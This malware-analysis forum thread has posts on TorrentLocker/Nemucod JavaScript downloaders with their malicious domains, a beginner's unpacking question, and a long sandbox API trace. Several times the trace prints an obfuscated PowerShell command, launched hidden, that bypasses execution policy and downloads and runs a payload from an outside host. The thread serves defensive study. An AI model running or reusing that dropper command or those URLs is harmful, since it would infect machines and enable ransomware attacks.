heart888 wrote:https://virustotal.com/en/file/cbb74f6d ... /analysis/crypt0l0cker TorrentLocker ransomware javascript downloader
hxxp://digifish3.com/alarg.vbn
BR,
Antelox
BR,
Antelox
A forum for reverse engineering, OS internals and malware analysis
BR,
Antelox
Hi all. I am a beginner in RE. I would like to know the approach on analyzing the malware. I dumped the malware sample into PE Studio and I can see isDebuggerPresent, GetTickCount, etc. Is this malware packed? If so what strategy can I use to unpack?
Attachments
(5.12 KiB) Downloaded 61 times
factura9.js is a variant of NEMUCOD connects to
Code: Select all
index.pjk is a variant of CRYPTLOCK attacheduzyzyxu.poreved.net
hzibi.poreved.net
axeqekynefi.poreved.net
ycypaqesoh.poreved.net
saunabau.sk/index.pjkCode: Select all
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptbase.dll, 75560000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 617abc, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2340
Call Window API API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 101e2 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, sxs.dll, 70eb0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, dwmapi.dll, 75410000 ) Return: 0 2340
Call Window API API Name: CreateWindowExA Args: ( 0, cd2e6c, , 0, 0, 0, 1, 1, 0, 0, cd0000, 82f860 ) Return: 101e4 2340
Call COM API API Name: CLSIDFromString Args: ( JScript ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, clbcatq.dll, 75e90000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\jscript.dll, 70df0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\system32\advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, wintrust.dll, 75a60000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptsp.dll, 75330000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\system32\rsaenh.dll, 752f0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptbase.dll, 75560000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, msisip.dll, 70de0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0 2340
Call Filesystem API API Name: NtReadFile Args: ( 1f8, , , , , , 200, , ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 1002, %windir%\syswow64\crypt32.dll, 774a0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, imm32.dll, 75670000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\wshext.dll, 70dc0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\scrobj.dll, 70d90000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, cryptsp.dll, 75330000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, rpcrtremote.dll, 73390000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\wshom.ocx, 70d60000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, ole32.dll, 77130000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, propsys.dll, 72cc0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, oleaut32.dll, 77050000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, advapi32.dll, 755d0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, apphelp.dll, 72c70000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, kernel32.dll, 757b0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, comctl32.dll, 72de0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\ieframe.dll, 71740000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, urlmon.dll, 758c0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, setupapi.dll, 76150000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 3099b6c, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0 2340
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, ntmarta.dll, 74810000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, profapi.dll, 72dd0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, %windir%\syswow64\urlmon.dll, 758c0000 ) Return: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, sspicli.dll, 75570000 ) Return: 0 2340
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 3d2f460 ) Return: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2340
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, shell32.dll, 76400000 ) Return: 0 2340
Call Thread API API Name: NtGetContextThread Args: ( 756, 3d2e758 ) Return: 0 2340
Call Process API API Name: CreateProcessW Args: ( %windir%\System32\cmd.exe, "%windir%\System32\cmd.exe" /c "powershell $ultute='^Process';$yrmynw='^olicy B';$setuk='^$path);';$ulyc='^k/index';$ajuk='^ $path';$funci='^xe'');(N';$gyffywf='^ew-Obje';$ovut='^nloadFi';$zijuk='^emp+''\i';$vowpu='^Set-Exe';$pluziqm='^cutionP';$opsubi='^nabau.s';$gyba='^.pjk '',';$uxed='^Webclie';$qhuzuww='^ Start-';$gydip='^em.Net.';$ezgylxy='^le(''htt';$gowu='^($env:t';$urqucla='^ $path=';$edeqo='^ct Syst';$ewcit='^qpaby.e';$jyvy='^rocess;';$abmofo='^p://sau';$rqazse='^Scope P';$kvexmy='^nt).Dow';$yxluge='^ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\", , , , , , %WorkingDir%, SW_HIDE, Process:2520:%windir%\SysWOW64\cmd.exe ) Return: 1 2340
Call System API API Name: LdrLoadDll Args: ( 5e0f3c, 0, oleaut32.dll, 77050000 ) Return: 0 2340
Call Window API API Name: DestroyWindow Args: ( 101e2 ) Return: 1 2340
Detection
Threat characteristic: Creates command line process
Process ID: 2520
Image Path: %windir%\SysWOW64\cmd.exe "%windir%\System32\cmd.exe" /c "powershell $ultute='^Process';$yrmynw='^olicy B';$setuk='^$path);';$ulyc='^k/index';$ajuk='^ $path';$funci='^xe'');(N';$gyffywf='^ew-Obje';$ovut='^nloadFi';$zijuk='^emp+''\i';$vowpu='^Set-Exe';$pluziqm='^cutionP';$opsubi='^nabau.s';$gyba='^.pjk '',';$uxed='^Webclie';$qhuzuww='^ Start-';$gydip='^em.Net.';$ezgylxy='^le(''htt';$gowu='^($env:t';$urqucla='^ $path=';$edeqo='^ct Syst';$ewcit='^qpaby.e';$jyvy='^rocess;';$abmofo='^p://sau';$rqazse='^Scope P';$kvexmy='^nt).Dow';$yxluge='^ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\"
Call Filesystem API API Name: FindFirstFileExW Args: ( %windir%\System32\WindowsPowerShell\v1.0\powershell.*, 1, 16ef90, 0, 0, 2 ) Return: 35b980 2340 2520
Call Thread API API Name: NtGetContextThread Args: ( 360, 16e2ac ) Return: 0 2340 2520
Call Process API API Name: CreateProcessW Args: ( %windir%\System32\WindowsPowerShell\v1.0\powershell.exe, powershell $ultute='Process';$yrmynw='olicy B';$setuk='$path);';$ulyc='k/index';$ajuk=' $path';$funci='xe'');(N';$gyffywf='ew-Obje';$ovut='nloadFi';$zijuk='emp+''\i';$vowpu='Set-Exe';$pluziqm='cutionP';$opsubi='nabau.s';$gyba='.pjk '',';$uxed='Webclie';$qhuzuww=' Start-';$gydip='em.Net.';$ezgylxy='le(''htt';$gowu='($env:t';$urqucla=' $path=';$edeqo='ct Syst';$ewcit='qpaby.e';$jyvy='rocess;';$abmofo='p://sau';$rqazse='Scope P';$kvexmy='nt).Dow';$yxluge='ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\, , , , , , %WorkingDir%, , Process:2552:%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) Return: 1 2340 2520
Detection
Threat characteristic: Creates process in system directory
Process ID: 2552
Image Path: %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $ultute='Process';$yrmynw='olicy B';$setuk='$path);';$ulyc='k/index';$ajuk=' $path';$funci='xe'');(N';$gyffywf='ew-Obje';$ovut='nloadFi';$zijuk='emp+''\i';$vowpu='Set-Exe';$pluziqm='cutionP';$opsubi='nabau.s';$gyba='.pjk '',';$uxed='Webclie';$qhuzuww=' Start-';$gydip='em.Net.';$ezgylxy='le(''htt';$gowu='($env:t';$urqucla=' $path=';$edeqo='ct Syst';$ewcit='qpaby.e';$jyvy='rocess;';$abmofo='p://sau';$rqazse='Scope P';$kvexmy='nt).Dow';$yxluge='ypass -'; Invoke-Expression ($vowpu+$pluziqm+$yrmynw+$yxluge+$rqazse+$jyvy+$urqucla+$gowu+$zijuk+$ewcit+$funci+$gyffywf+$edeqo+$gydip+$uxed+$kvexmy+$ovut+$ezgylxy+$abmofo+$opsubi+$ulyc+$gyba+$setuk+$qhuzuww+$ultute+$ajuk);\
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, cryptbase.dll, 75560000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2f2a8c, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2520 2552
Call Window API API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 201e6 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, clbcatq.dll, 75e90000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 385a5c, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, ole32.dll, 77130000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, userenv.dll, 728e0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, comctl32.dll, 72de0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, comctl32.dll, 72de0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, shell32.dll, 76400000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, oleaut32.dll, 77050000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, ole32.dll, 77130000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 39724c, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0 2520 2552
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2b3ca4, 0, ntmarta.dll, 74810000 ) Return: 0 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\SOFTWARE\Classes\Local Settings\MuiCache\9B\52C64B7E\LanguageList Value: en-US\0en\0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, apphelp.dll, 72c70000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e02a6c, 0, %windir%\system32\shdocvw.dll, 728b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, propsys.dll, 72cc0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, oleaut32.dll, 77050000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0 2520 2552
Call Filesystem API API Name: CreateDirectoryW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations, 0 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 383a6c, 0, %windir%\syswow64\shell32.dll, 76400000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, linkinfo.dll, 728a0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, propsys.dll, 72cc0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, oleaut32.dll, 77050000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, profapi.dll, 72dd0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, user32.dll, 75b90000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, ntshrui.dll, 72830000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, srvcli.dll, 729c0000 ) Return: 0 2520 2552
Call Systeminfo API API Name: GetComputerNameExW Args: ( 0, NeilOffice, 10 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, setupapi.dll, 76150000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, cscapi.dll, 72820000 ) Return: 0 2520 2552
Call Internet Helper API API Name: NetShareEnum Args: ( , 503, 72860250, -1, 19e9c0, 19e9bc, 0 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, slc.dll, 73030000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, shlwapi.dll, 75a00000 ) Return: 0 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19f1dc ) Return: 1 2520 2552
Call Filesystem API API Name: CreateDirectoryW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations, 0 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, cryptsp.dll, 75330000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, %windir%\system32\rsaenh.dll, 752f0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, cryptbase.dll, 75560000 ) Return: 0 2520 2552
Add File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\92N1BEHO885SX4SPL6K0.temp Type: VSDT_COM_DOS 2520 2552
Write File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\92N1BEHO885SX4SPL6K0.temp Type: VSDT_COM_DOS 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Add File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_EMPTY 2520 2552
Add File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_COM_DOS 2520 2552
Add File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms Type: VSDT_COM_DOS 2520 2552
Call Filesystem API API Name: DeleteFileW Args: ( %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP ) Return: 1 2520 2552
Call Window API API Name: DestroyWindow Args: ( 201e6 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, shlwapi.dll, 75a00000 ) Return: 0 2520 2552
Attachments
pw virus
(351.85 KiB) Downloaded 62 times
(351.85 KiB) Downloaded 62 times
Last edited by maddog4012 on Wed Mar 01, 2017 6:22 pm, edited 2 times in total.
here is the rest of the info
Code: Select all
Delete File Path: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1caffb.TMP Type: VSDT_COM_DOS 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2df339c, 0, %windir%\microsoft.net\framework\v2.0.50727\mscorwks.dll, 70490000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, ntdll, 77a10000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e01bdc, 0, shell32.dll, 76400000 ) Return: 0 2520 2552
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\Administrator, 0 ) Return: 0 2520 2552
Call Filesystem API API Name: CreateDirectoryW Args: ( %APPDATA%, 0 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 0, 0, %windir%\system32\mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e15554, 0, %windir%\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, 6f990000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, %windir%\microsoft.net\framework\v2.0.50727\ole32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, ole32.dll, 77130000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e1aa4c, 0, %windir%\microsoft.net\framework\v2.0.50727\oleaut32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, oleaut32.dll, 77050000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, ole32.dll, 77130000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e1ffbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll, 6f1f0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e23cf4, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\b1c511d8fad78ad3c5213b2b4fb02b8b\microsoft.powershell.consolehost.ni.dll, 72790000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e2d0cc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.management.a#\4436815b432c313255af322f4ec3560d\system.management.automation.ni.dll, 6e680000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, kernel32.dll, 757b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, version.dll, 74480000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\psapi.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, psapi.dll, 779e0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\ntdll.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, ntdll.dll, 77a10000 ) Return: 0 2520 2552
Call Systeminfo API API Name: NtQuerySystemInformation Args: ( 5, , 131072, 45560 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, user32.dll, 75b90000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, cryptsp.dll, 75330000 ) Return: 0 2520 2552
Call System API API Name: CryptExportKey Args: ( 2eefc8, 0, 6, 0, 0, 19ea20 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll, 6e440000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e3358c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4f68cd04686e5dc5a55070d112d44bdf\microsoft.powershell.commands.diagnostics.ni.dll, 72740000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e34cec, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll, 728b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e371dc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\ee28a075665b6bc23b6dae56903d431d\microsoft.wsman.management.ni.dll, 726b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e3e1dc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll, 70e10000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e3e6a4, 0, %windir%\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll, 67aa0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e40c1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\3008a05e2928e2c1d856cc34e0422c17\microsoft.powershell.commands.utility.ni.dll, 6e2a0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e40c1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\8df695fb80187f65208d87229e81e8a2\microsoft.powershell.commands.management.ni.dll, 70d40000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e444c4, 0, %windir%\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\8ce205027e30804d1b2deaffa0582735\microsoft.powershell.security.ni.dll, 6e270000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e445bc, 0, %windir%\microsoft.net\framework\v2.0.50727\culture.dll, 60340000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, kernel32.dll, 757b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll, 6dd30000 ) Return: 0 2520 2552
